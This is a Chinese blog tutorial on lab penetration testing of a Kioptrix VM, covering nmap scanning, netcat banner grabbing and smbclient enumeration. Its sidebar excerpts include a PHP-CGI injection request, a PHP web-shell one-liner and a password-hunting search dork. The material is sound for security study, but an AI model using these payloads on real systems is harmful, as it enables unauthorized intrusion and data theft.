渗透测试之手动漏洞利用

最新推荐文章于 2023-06-19 14:00:00 发布
最新推荐文章于 2023-06-19 14:00:00 发布
阅读量1.1w 收藏 9
点赞数 4
分类专栏: 网络安全 渗透测试 文章标签: 渗透测试 漏洞利用 服务扫描
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jeanphorn/article/details/46449885
版权

1. 实验环境描述

  为了做漏洞利用的实验,前一片文章我已经介绍了Kioptrix靶机的安装和网络的配置。现在看一下虚拟机里必要的两个系统:Kioptrix虚拟机和Kali Linux虚拟机。前者为靶机,后者作为攻击机使用。网络拓扑如下图所示:
  network

2. 列举服务

  首先我们使用nmap命令对网络中的机器进行扫描,输入以下命令对192.168.50.0/24网段上所有的IP和TCP端口进行扫描。
  
  nmap -f -n -P0 -T4 192.168.50.0/24
  
  扫描结果如下:
  scan re
  
  现在,我们就可以知道机器是在线的,而且可以看到目标机器开放了TCP端口,分别为22、80、139、445。接下来,我们有多个方案可供选择,可以使用netcat或其他相似程序手动探查这些端口以获得更多的信息。

3. 利用nmap进行完全扫描

  现在我们确定了目标系统,其IP地址为”192.168.50.102“,下面来进行有针对性的nmap扫描,观察扫描的信息。
  nmap -n -sTUV -pT:22,80,139,443,U:111,137,53 192.168.50.102

  -sTUV:表示扫描TCP和UDP的端口,确定端口的状态,并且输出相关软件的版本信息;
  -P:表示指定扫描的范围,以及需要扫描的端口;
  u: 指定端口为UDP;

  下面为扫描结果:
  nmap_to
  从结果可以发现一些有价值的信息,比如host:KIOPTRIX4;OSs;开放的端口及版本信息等。为下一步寻找漏洞做准备。

  注意OSs标签,是一种概率性表示,并不一定真实。OSs:linux, windows表示这可能是一台linux,或者windows。要根据所有输出结果来审查。

4. 使用netcat和ncat来获取旗标

  netcat是一个强大的工具,可以再信息收集和漏洞利用阶段使用,更甚者可以用来创建后门和传输文件。

4.1 netcat获取旗标

  使用以下命令,连接192.168.50.102的80端口。
  
  nc 192.168.50.102 80

  这将连接到Kioptrix的Web服务,我们需要用指令来获取返回的信息。输入:HEAD / HTTP 1.1 ,然后连续按两次ENTER键,查看输出的结果:
  nc
  
  这里输出的时HTTP头部的内容,上面的信息表明,目标机器上运行了Apache/2.2.8,系统为Ubuntu;PHP版本为PHP/5.2.4-2。

4.2 使用ncat获取旗标

  这个过程和nc类似。 参考4.1内容即可。

4.3 使用smbclient获取旗标

  TCP的139端口是一个很有趣的端口,利用smbclient工具可以获得这个服务的旗标。输入以下命令:
  
  smbclient -L 192.168.50.102 -N

  smbclient连接到192.168.50.102,然后显示服务信息。-N选项表示没有目标的root密码。

  输出结果如下:
  smb
  
  从结果上看,samba的版本为3.0.28a,我们可以利用这个信息来搜索针对这个服务器的可能存在的漏洞。

jeanphorn
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Gr33k:图形化漏洞利用集成工具
05-08
一个图形化的漏洞利用集成工具,它用python3书写,参考了大量安全工具的实现原理与思想,在工作之余开发,方便自己的渗透测试工作,我的目的是打造一个红队武器化工具,路还很长,慢慢更新! 提示 本工具提供了大量...
手动渗透测试漏洞
weixin_34082789的博客
09-18 287
1. 实验环境的叙述性说明   做实验的攻击,以前我已经介绍了一篇文章Kioptrix安装和网络无人驾驶飞机配置。现在看一下虚拟机所需的两个系统:Kioptrix虚拟机和Kali Linux虚拟机。前者为靶机,后者作为攻击机使用。网络拓扑例如以下图所看到的:    2. 列举服务   首先我们使用nmap命令对网络中的机器进行扫描。输入下面命令对192.168.50.0...
渗透之漏洞利用
薛定谔的博客
06-09 4499
1.使用Medusa获得远程服务的访问权限Medusa被称为通过并行登录暴力破解的方式尝试获取远程验证服务访问权限的工具。想要使用Medusa需要事先获取一些信息,包括目标IP地址,用于登录的某个用户名或一个用户列表,在登录时使用的某个密码或包含众多密码的字典文件。2.Metasploit在介绍Metasploit之前,先对比一下Metasploit与漏洞扫描之间的区别。大多数情况下,我们利用漏洞...
渗透测试笔记】之【手动漏洞挖掘一】
AA8j的博客
07-08 746
WIndows默认安装漏洞 利用php配置漏洞,执行php代码进而执行系统命令 (可利用Burpsuite发送POST) POST http://192.168.2.100/phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 Host: 192.168.2.100 <?php passthru('id'); die(); ?> ...
渗透测试笔记】之【手动漏洞挖掘二】
AA8j的博客
07-09 292
身份认证 常用弱口令/基于字典的密码爆破 一个好的Web,当离错误密码错误过多后会锁定账号。 信息收集 手机号、密码错误提示信息 做得好的它会显示用户名或密码错误 做得不好的它会提示用户不存在 (另外还有在返回代码中的提示,如errorcode,不会在页面提示) 此时就可以根据收集的信息进行暴力破解 密码嗅探(同一网段,流量抓包) 会话sessionID Xss/cookie import SessionID in URL 一些不好的Web会将SessionID写入URL里 嗅探 同网段流量抓包 Se
渗透测试笔记】之【手动漏洞挖掘四】
AA8j的博客
07-11 196
文件上传漏洞 上传一句话木马 <?php echo shell_exec($_GET['cmd']);?> 访问该文件,并在末尾加上 ?cmd=id
TIDoS框架:令人反感的手动Web应用程序渗透测试框架
02-26
拒绝服务 攻击性Web应用程序渗透测试框架。 重要提示: 新的Qt5接口已完成,但具有其他依赖性。 查看更新的安装说明。强调 :- 以下是有关框架的全部内容: 一个完整的通用框架,涵盖了从侦察到漏洞分析的所有内容。...
Kali Linux渗透测试(安全牛).txt
04-17
│ 任务001:Kali Linux渗透测试介绍.mp4 │ ├─第2章 Kali安装 │ 任务002:Kali Linux安装-硬盘安装、虚拟机安装.mp4 │ 任务003:Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令.mp4 │ 任务004:...
botb:面向渗透测试人员和工程师的容器分析和开发工具
05-08
BOtB是一种容器分析和开发工具,旨在供渗透测试人员和工程师使用,同时也支持CI / CD和常见的CI / CD技术。 它有什么作用? BOtB是一个CLI工具,可让您执行以下操作: 利用常见的容器漏洞 执行常见的容器后期利用...
渗透测试神器BurpSuite pro v2.0.11beta & keygen & 汉化
01-15
例如:代{过}{滤}理记录的请求可被Intruder 用来构造一个自定义的自动攻击的准则,也可被Repeater 用来手动攻击,也可被Scanner 用来分析漏洞,或者被Spider(网络爬虫)用来自动搜索内容。应用程序可以是“被动地”...
【10.21总结】一个渗透测试练习实例——发现未知的漏洞(Race condition)
09-10 468
Write-up地址:Exploiting an unknown vulnerability 作者:Abhishek Bundela   这篇文章跟我之前看到的文章不太一样,作者是按照一个练习的方式简单描述了他对一个应用进行渗透测试的过程,其中提到的许多测试虽然没有成功,但是对于像我这样的菜鸟来说还是有很大的启发,事实上在看的过程中我会很疑惑,也可能是因为我之前并不是特别了解逻辑漏洞,而许多bug bounty的write-up中提到的漏洞类型是比较集中的XSS或者CSRF,所以这篇文章让我从另一...
超实用!手把手教你如何3步进行Web渗透测试
m0_74942241的博客
06-19 267
渗透测试,是渗透测试工程师完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标网络、主机、应用的安全作深入的探测,发现系统最脆弱的环节。如果说安全检测是"横向地毯式自动化扫描",那么渗透测试就是"纵向深度人工化入侵"。可见渗透测试的目的是发现目标系统潜在的业务漏洞风险。安全问题都体现在输入输出的问题上,能够分析数据流就有迹可循了。先知道渗透测试的流程,用工具找到漏洞,了解并且复现它。
渗透测试要怎么做?
qq_43305605的博客
12-29 2098
渗透测试的一般做法 很多企业应用,特别是web应用,利用商业的漏洞扫描工具做安全/渗透测试比较多。利用这种商业性漏洞扫描工具进行自动化扫描的比较多。但是由于一些不太确定的原因,自动化扫描出来的结果有很多是误报,结果是不太准确的。 反而在企业中,进行手动渗透测试的不多。如果不手动去排查漏洞,其实可能会漏掉一些比较严重的漏洞。那么为什么手动渗透测试比较重要呢? 只有自己是最了解自己的,企业内部专人去手动排查安全漏洞,会比较有侧重点,这样就可以达到事半功倍的效果。 自动化扫描,只是基于一些既定规则的扫描扫描
网站接口漏洞检测 分多个阶段渗透测试检查
网站安全专家
03-07 609
首先是渗透接口测试:在安全工程师角度看这就是1个十分好的知识要点积累的方式,不仅有利于你现在每次的网站渗透测试中不遗漏掉某一点,而且还能够在队伍里面开展分享有利于提高队伍里面队员的技术。我们SINE安全在针对甲方的网站渗透测试来说,在刚开始情况下和客户沟通许多有关事项是十分用得着的:第2个是常用工具:磨刀不误砍柴工,工欲善其事,有个好的常用工具影响大家在网站渗透测试时的工作效率。1个好的常用工具应...
渗透测试怎么做,看完这个我也学会了【宝藏教程】
qq_73332379的博客
02-25 825
1、弱口令漏洞 漏洞描述 目标网站管理入口(或数据库等组件的外部连接)使用了容易被猜测的简单字符口令、或者是默认系统账号口令。 渗透测试 ① 如果不存在验证码,则直接使用相对应的弱口令字典使用burpsuite 进行爆破 ② 如果存在验证码,则看验证码是否存在绕过、以及看验证码是否容易识别 风险评级:高风险 安全建议 ① 默认口令以及修改口令都应保证复杂度,比如:大小写字母与数字或特殊字符的组合,口令长度不小于8位等 ② 定期检查和更换网站管理口令 2、文件下载(目录浏览)漏洞 漏洞描述 一些网站由于业
浅析渗透测试手动和自动的优缺点
ichunqiu2018的博客
02-12 3312
手动渗透测试和自动渗透测试本是出于相同的目的,即帮助企业主动发现漏洞,了解现有安全措施的成效或不足。它们之间的唯一区别就是执行方式不同,手动渗透测试是由人工来完成,自动渗透测试是由机器本身完成。 那么,手动与自动渗透测试孰优孰劣?我们不妨来比较一下各自的优缺点。 手动渗透测试手动渗透测试中,机器的脆弱性和风险是由渗透测试工程师或安全专家进行测试。 通常,执行的方法有: 1、数据收集:数据收集在测试中起着关键作用。一个人可以手动收集数据,也可以使用在线免费提供的工具服务(网页源代码分析技术等)。这些工具
隐藏文件到图片或音频中——Kali linux Steghide工具
热门推荐
Jeanphorn的专栏
04-14 1万+
1. 介绍  Kali Linux操作系统通常被一些安全专家和网络罪犯用来做渗透和审计工作,但是除此之外,这里介绍一个另外的特别的功能:将目标文件隐藏到图片或者音频中。(看起来好诱人的样子,有没有跃跃欲试的感觉,^_^)2. 安装steghide工具到Kali linux中  如果你的Kali Linux还没有更新过的话,那么执行以下命令进行更新。   # apt-get upgrade   当
Google Hack技巧——不用暴力也可以取得密码
Jeanphorn的专栏
04-06 1万+
引言        google是获取信息信息重要宝贵工具之一。google搜索引擎尤其还可以用来获取存储在服务器上的用户名和密码数据。如果有些用户没有把重要的数据完全存储在有人证机制的文件夹中,那么这些数据就可能被google的搜索引擎抓到。google search抓取密码的相关语法 1 “Login: ” “password =” filetype: xls ( 搜索存储在excel文件中含有
渗透测试漏洞利用之漏洞攻击
Jeanphorn的专栏
06-14 1万+
1. 查找目标系统的相关漏洞  在前一篇渗透测试的博文中,介绍了目标系统相关信息的收集方法。接下来,任意Kioptrix靶机为例,具体介绍下相关漏洞的详细利用过程。   在exploit-db.com网站上,一般能够找到已知漏洞的有价值的信息,以及验证其有效性的概念验证代码(POC)。概念验证代码可以帮助你理解这个漏洞的原理和形成机制,从而让你能够确定防护措施是否正常工作。2. 离线的漏洞库  在
红队渗透测试lampiao
最新发布
09-14
lampiao是一个用于红队渗透测试的虚拟机靶机。根据引用提供的信息,你可以通过以下步骤来进行该渗透测试: 1. 下载lampiao虚拟机:你可以从"https://download.vulnhub.com/lampiao/Lampiao.zip"下载lampiao虚拟机。下载完成后,解压缩文件并使用VirtualBox打开.ovf文件。 2. 扫描靶机信息:根据引用,你可以使用nmap工具对lampiao虚拟机进行详细的端口扫描,以了解是否有遗漏的端口。确保扫描到的所有端口都被纳入考虑范围。 3. 探索漏洞利用工具:根据引用,你可以搜寻一些漏洞的利用工具,如mirrors、FireFart和DirtyCOW。这些工具可能有助于你发现靶机中存在的漏洞,并帮助你进一步的渗透测试。 4. 利用漏洞进行渗透:一旦你发现了可能存在的漏洞,你可以使用相应的漏洞利用工具或手动方法来利用这些漏洞。这将帮助你获取更深入的访问权限,并探索靶机内部的潜在目标。 注意:在进行任何渗透测试之前,请确保你获得了合法的授权,并在合法的环境中进行测试。渗透测试是一项敏感的活动,需要遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值